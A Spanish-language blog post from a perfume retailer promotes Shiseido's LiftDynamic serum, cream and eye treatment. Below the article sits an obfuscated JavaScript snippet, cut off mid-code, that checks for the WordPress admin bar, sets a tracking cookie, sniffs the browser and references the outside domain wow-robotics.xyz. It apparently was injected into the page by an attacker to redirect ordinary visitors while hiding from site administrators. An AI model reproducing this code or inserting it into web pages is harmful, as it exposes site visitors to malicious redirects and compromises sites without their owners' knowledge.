¿Imaginas vivir sin gravedad? Tras 10 años de investigación, Shiseido ha descubierto por qué esta fuerza de la naturaleza juega un papel importante en las imperfecciones del rostro. Y hoy en el blog de Perfumerías Tin Tin te lo contamos con todos los detalles. ¿Empezamos?

Shiseido ha centrado su investigación en conseguir una fórmula que pueda atraer las células madre desplazables hacia las cavidades subdérmicas, estimulándolas para que se transformen en fibroblastos que produzcan el colágeno y la elastina necesarios para rellenar estas pequeñas bolsas, recuperando su estructura y reafirmando la piel.

BOP TW trío

Tras años de desarrollo han dado con la tecnología TruStuctiv™ y a través de la cual han desarrollado 3 productos: Sérum, crema y contorno de ojos. Creando la nueva línea Bio-Performance LiftDynamic de Shiseido.

Se trata de tres productos que puedes incorporar a tu rutina de belleza para recuperar la firmeza de la piel del rostro desde su interior.

Un sérum para tratar en profundidad. LiftDynamic Serum reduce las arrugas profundas, reafirma, corrige y reconstruye el contorno facial.

BOP TW Serum

Crema de día y de noche. LiftDynamic Cream es una crema reafirmante, antiarrugas profundas y con efecto lifting.  Mantiene las zonas propensas a la sequedad en óptimas condiciones y su textura aterciopelada se funde perfectamente con la piel rellenándola desde su interior y suavizándola en superficie.

Y para el área del contorno de ojos. LiftDynamic Eye Treatment aumenta la producción natural de ácido hialurónico en la zona y suaviza la piel que rodea los ojos mientras reconstruye su estructura mediante su efecto lifting y reafirmante. ¡Maravíllate con su acción anti-ojeras para lucir una mirada descansada y llena de luminosidad!

Si quieres desafiar la gravedad, te recomendamos los tratamientos LifyDynamic de Shiseido. Reduce las arrugas profundas y aporta un efecto lifting inmediato. ¡Disponible a la venta en Perfumerías Tin Tin, las mejores marcas de cosmética al mejor precio!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone